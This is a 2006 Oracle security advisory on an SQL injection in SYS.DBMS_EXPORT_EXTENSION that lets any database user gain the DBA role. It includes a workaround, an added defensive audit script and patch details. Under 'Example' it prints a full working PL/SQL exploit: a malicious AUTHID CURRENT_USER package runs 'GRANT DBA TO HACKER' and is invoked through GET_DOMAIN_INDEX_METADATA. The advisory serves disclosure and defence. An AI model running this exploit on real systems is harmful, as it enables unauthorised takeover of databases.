Red-Database-Security GmbH is specialized in Oracle Security

SQL Injection via Oracle DBMS_EXPORT_EXTENSION in Oracle 9i / 10g


Name: SQL Injection via Oracle DBMS_EXPORT_EXTENSION in Oracle 9i / 10g
Systems Affected: Oracle 8i / 9i / 10g / XE
Severity: High Risk
Category: SQL Injection
Vendor URL: http://www.oracle.com/
Credit: Exploit N1V1Hd $3c41r3
Exploit: bugtraq
Date: 20 Apr 2006 (V 1.00)
Status: fixed with Oracle CPU July 2006 [DB06]

Details

SYS.DBMS_EXPORT_EXTENSION is a package owned by SYS, executed with SYS privileges, and granted to PUBLIC. Its function GET_DOMAIN_INDEX_METADATA uses the caller-supplied TYPE_SCHEMA and TYPE_NAME parameters to look up and call the ODCIIndexGetMetadata function of that "index type" without checking who owns it, so any database user can point it at a package of their own. The following proof-of-concept exploit (a 0day at the time of publication) does exactly that: it supplies an attacker-owned package with a matching ODCIIndexGetMetadata function. Because the package is declared AUTHID CURRENT_USER, the function runs in the SYS context and grants the DBA role to the user HACKER. The exploit also works on Oracle 9i Release 2 and Oracle 10g Express Edition (XE).


Workarounds
Revoke the EXECUTE privilege on the package from PUBLIC:

REVOKE EXECUTE ON SYS.DBMS_EXPORT_EXTENSION FROM PUBLIC FORCE;

The package DBMS_EXPORT_EXTENSION is needed to create export files. After revoking the PUBLIC grant, grant EXECUTE on DBMS_EXPORT_EXTENSION directly to the account that runs your exports (e.g. SYSTEM), otherwise exports will fail. The revoke only limits who can reach the vulnerable package; the actual fix is the patch listed below.
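The following script is an added example and not part of the original advisory: it applies the workaround above, re-grants the privilege to the export account, and then verifies the result and hunts for the attack pattern the advisory describes. It assumes a DBA session (SQL*Plus or similar) and the standard data-dictionary views DBA_TAB_PRIVS, DBA_PROCEDURES and DBA_ROLE_PRIVS; the export account name SYSTEM is the advisory's own suggestion.

```sql
-- Added example, not the advisory's own code. Assumes a DBA session and the
-- standard SYS views DBA_TAB_PRIVS, DBA_PROCEDURES and DBA_ROLE_PRIVS.

-- 1. Remove the PUBLIC grant that makes the package reachable by every user.
REVOKE EXECUTE ON SYS.DBMS_EXPORT_EXTENSION FROM PUBLIC FORCE;

-- 2. Give the privilege back only to the account that actually runs exports
--    (SYSTEM is the account the advisory suggests; adjust to your export user).
GRANT EXECUTE ON SYS.DBMS_EXPORT_EXTENSION TO SYSTEM;

-- 3. Verify: PUBLIC must no longer appear; the result should list only the
--    export account and any other grantee you added on purpose.
SELECT grantee, privilege, grantable
FROM   dba_tab_privs
WHERE  owner      = 'SYS'
AND    table_name = 'DBMS_EXPORT_EXTENSION'
ORDER BY grantee;

-- 4. Hunt for the attack pattern: an invoker-rights package (AUTHID
--    CURRENT_USER) outside SYS that implements ODCIIndexGetMetadata, which is
--    what the proof of concept below creates. Oracle-supplied schemas that
--    ship domain-index implementations may legitimately appear here, so
--    review each hit instead of dropping it blindly.
SELECT owner, object_name, procedure_name, authid
FROM   dba_procedures
WHERE  procedure_name = 'ODCIINDEXGETMETADATA'
AND    owner <> 'SYS'
AND    authid = 'CURRENT_USER'
ORDER BY owner, object_name;

-- 5. Check who holds DBA. The exploit's payload is a plain GRANT DBA, so an
--    unexpected grantee in this list is the simplest indicator of compromise.
SELECT grantee, admin_option
FROM   dba_role_privs
WHERE  granted_role = 'DBA'
ORDER BY grantee;
```

Run steps 3 to 5 again after applying the CPU: the grant list tells you whether the workaround survived the patch, and the last two queries are cheap enough to keep in a regular audit script.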


Example
-- Step 1: create a package in the attacker's schema (here HACKER) whose
-- ODCIIndexGetMetadata function has the signature DBMS_EXPORT_EXTENSION
-- expects. AUTHID CURRENT_USER makes the function run with the privileges
-- of its caller, which will be SYS.
CREATE OR REPLACE PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,
                                 P3         VARCHAR2,
                                 p4         VARCHAR2,
                                 env        SYS.odcienv)
    RETURN NUMBER;
END;
/

CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,
                                 P3         VARCHAR2,
                                 p4         VARCHAR2,
                                 env        SYS.odcienv)
    RETURN NUMBER
  IS
    -- The function is invoked from inside a SQL statement, where DDL is not
    -- permitted; an autonomous transaction lets the GRANT run and commit anyway.
    pragma autonomous_transaction;
  BEGIN
    EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
    COMMIT;
    RETURN(1);
  END;
END;
/

-- Step 2: make DBMS_EXPORT_EXTENSION (running as SYS) call the attacker's
-- package by passing its schema and name as the "index type".
DECLARE
  INDEX_NAME   VARCHAR2(200);
  INDEX_SCHEMA VARCHAR2(200);
  TYPE_NAME    VARCHAR2(200);
  TYPE_SCHEMA  VARCHAR2(200);
  VERSION      VARCHAR2(200);
  NEWBLOCK     PLS_INTEGER;
  GMFLAGS      NUMBER;
  v_Return     VARCHAR2(200);
BEGIN
  INDEX_NAME   := 'A1';
  INDEX_SCHEMA := 'HACKER';
  TYPE_NAME    := 'MYBADPACKAGE';
  TYPE_SCHEMA  := 'HACKER';
  VERSION      := '10.2.0.2.0';
  GMFLAGS      := 1;

  v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
                INDEX_NAME   => INDEX_NAME,
                INDEX_SCHEMA => INDEX_SCHEMA,
                TYPE_NAME    => TYPE_NAME,
                TYPE_SCHEMA  => TYPE_SCHEMA,
                VERSION      => VERSION,
                NEWBLOCK     => NEWBLOCK,
                GMFLAGS      => GMFLAGS);
END;
/


Patch Information
Apply Oracle CPU July 2006.

Patches for Oracle XE are currently not available.

History
21-apr-2006 - Initial version
06-may-2006 - Workaround enhanced. Thanks to Kristina Hackert for the hint.
18-july-2006 - Info from Oracle CPU July 2006 added.




2006 by Red-Database-Security GmbH - last update 18-july-2006

Definition Exploit
An exploit is a common term in computer security for a piece of software that takes advantage of a bug or vulnerability, leading to a privilege escalation or denial of service on a computer system.
Computer security experts use exploit code to test whether a patch is working properly.